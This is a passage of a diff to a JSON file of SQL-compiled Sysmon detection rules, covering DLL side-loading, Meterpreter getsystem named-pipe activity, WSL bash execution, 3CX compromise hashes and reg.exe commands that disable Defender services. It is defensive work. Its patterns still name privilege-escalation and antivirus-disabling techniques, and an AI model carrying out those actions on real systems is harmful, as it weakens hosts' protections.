'%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 
'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "status": "experimental", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + 
"attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Other security solution installers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", - "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", 
